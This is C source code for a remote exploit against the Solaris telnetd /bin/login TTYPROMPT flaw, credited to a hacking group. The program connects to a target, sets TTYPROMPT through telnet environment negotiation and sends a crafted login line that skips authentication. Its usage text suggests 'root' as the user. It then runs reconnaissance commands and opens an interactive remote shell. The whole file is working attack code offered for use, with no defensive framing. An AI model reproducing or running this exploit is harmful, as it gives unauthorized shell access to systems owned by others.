/******************************************************************


Solaris 2.6, 7, and 8 /bin/login TTYPROMPT remote exploit.

Tested for: 
SunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc 
SunOS 5.7, 5.8 x86 

Code by lion
lion@cnhonker.net

Welcome to HUC website http://www.cnhonker.com 


******************************************************************/ 

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/telnet.h>

#define BUFLEN 1024

char shellcode[]= "\x97\x97\x97\x97\x97\x97";

void usage(char *p)
{
   printf("Usage: %s [-u user] [-p port] <-h host>\n\n", p);
   printf("       -u: login username (default: bin), try \"root\" :)\n");
   printf("       -p: port to use (default: 23)\n\n");

   printf("\n"); 
   exit(0);
}

void msg(char *msg)
{
    perror(msg);
    exit(errno);
}

u_int32_t get_ip(char *host)
{
    struct hostent *hp;
    
    if(!(hp = gethostbyname(host))){
        fprintf(stderr, "cannot resolve %s\n", host);
        return(0);
    }
    return(*(u_int32_t *)hp->h_addr_list[0]);
}

int get_socket(char *target, int port)
{
    int sock;
    u_int32_t ip;
    struct sockaddr_in sin;

    if(!(ip = get_ip(target)))
        return(0);
    
    bzero(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = ip;
    
    if(!(sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        msg("socket");
    if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        msg("connect");
    return(sock);
}

void send_wont(int sock, int option)
{
    char buf[3], *ptr=buf;
    
    *ptr++ = IAC;
    *ptr++ = WONT;
    *ptr++ = (unsigned char)option;
    if(write(sock, buf, 3) < 0)
        msg("write");
    return;
}

void send_will(int sock, int option)
{
    char buf[3], *ptr=buf;

    *ptr++ = IAC;
    *ptr++ = WILL;
    *ptr++ = (unsigned char)option;
    if(write(sock, buf, 3) < 0)
        msg("write");
    return;
}

void send_do(int sock, int option)
{
    char buf[3], *ptr=buf;

    *ptr++ = IAC;
    *ptr++ = DO;
    *ptr++ = (unsigned char)option;
    if(write(sock, buf, 3) < 0)
        msg("write");
    return;
}

void send_env(int sock, char *name, char *value)
{
    char buf[BUFLEN], *ptr = buf;
    
    *ptr++ = IAC;
    *ptr++ = SB;
    *ptr++ = TELOPT_NEW_ENVIRON;
    *ptr++ = TELQUAL_IS;
    *ptr++ = NEW_ENV_VAR;
    strncpy(ptr, name, BUFLEN-20);
    ptr += strlen(ptr);
    *ptr++ = NEW_ENV_VALUE;
    strncpy(ptr, value, (&buf[BUFLEN-1] - ptr)-1);
    ptr += strlen(ptr);
    *ptr++ = IAC;
    *ptr++ = SE;
    
    if(write(sock, buf, (ptr - buf)) < 0)
        msg("write");
    return;
}

void do_negotiate(int sock)
{
    send_wont(sock, TELOPT_TTYPE);
    send_wont(sock, TELOPT_NAWS);
    send_wont(sock, TELOPT_LFLOW);
    send_wont(sock, TELOPT_LINEMODE);
    send_wont(sock, TELOPT_XDISPLOC);
    send_will(sock, TELOPT_LFLOW);
    send_will(sock, TELOPT_LINEMODE);
    send_wont(sock, TELOPT_OLD_ENVIRON);
    send_will(sock, TELOPT_NEW_ENVIRON);
    send_will(sock, TELOPT_BINARY);
    send_env(sock, "TTYPROMPT", shellcode);
    return;
}

void write_attack_buf(int sock, char *user)
{
    char outbuf[128],*s_buf;
    int i, j;

    if(!(s_buf = (char *)calloc(BUFLEN*2, 1)))
        msg("malloc");

    strcpy(outbuf, user);
    for(i = 0; i < 65; i++)
    {
       strcat(outbuf, " c");
    }
    strcat(outbuf, "\n");
    
    printf("send to target:\n%s\n", outbuf);
    if(write(sock, outbuf, strlen(outbuf)) < 0)
        msg("write"); 
    


    /* -- 2 reads for reading the garbage which screws up term -- */
    if((j = read(sock, s_buf, BUFLEN)) < 0)
        msg("read");

    if((j = read(sock, s_buf, BUFLEN)) < 0)
        msg("read");
    free(s_buf);
    return;
}

int main(int argc, char **argv)
{
    int c, n, sockfd, port = 23;
    char buf[2048], *shellstr="cd /; id; pwd; uname -a;\r\n";
    char user[36], host[36];
    fd_set rset;

    printf("============================================================\n");
    printf("Solaris 5.6 7 8 telnetd Remote exploit\n");
    printf("Tested for:\nSunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc\nSunOS 5.7, 5.8 x86\n");
    printf("Code by lion, Welcome to HUC website http://www.cnhonker.com\n\n");

    if(argc <3)  usage(argv[0]);
    strcpy(user, "bin");
    while((c = getopt(argc, argv, "h:u:p:")) != EOF){
        switch(c){
            case 'h':
                strncpy(host, optarg, 36);
                break;
            case 'u':
                strncpy(user,optarg, 36);
                break;
            case 'p':
                port = atoi(optarg);
                break;
        }
    }
    
    if(!(sockfd = get_socket(host, port)))
        exit(-1);

    do_negotiate(sockfd);

    n = read(sockfd, buf, sizeof(buf));

    write_attack_buf(sockfd,user);

    send_wont(sockfd, TELOPT_BINARY);

    sleep(1);
    read(sockfd, buf, sizeof(buf));

    write(sockfd, shellstr, strlen(shellstr));
    n = read(sockfd, buf, sizeof(buf));

    FD_ZERO(&rset);
    for(;;){
        FD_SET(0, &rset);
        FD_SET(sockfd, &rset);
        if(select(sockfd+1, &rset, NULL, NULL, NULL) < 0)
            msg("select");
        
        if(FD_ISSET(sockfd, &rset)){
            bzero(buf, sizeof(buf));
            if((n = read(sockfd, buf, sizeof(buf))) < 0)
                msg("read");
            if(n == 0){
                printf("EOF\n");
                exit(0);
            }
            write(1, buf, n);
        }
        
        if(FD_ISSET(0, &rset)){
            bzero(buf, sizeof(buf));
            if((n = read(0, buf, sizeof(buf))) < 0)
                msg("read");
            if(n == 0)
                exit(0);
            write(sockfd, buf, n);
        }
    }
}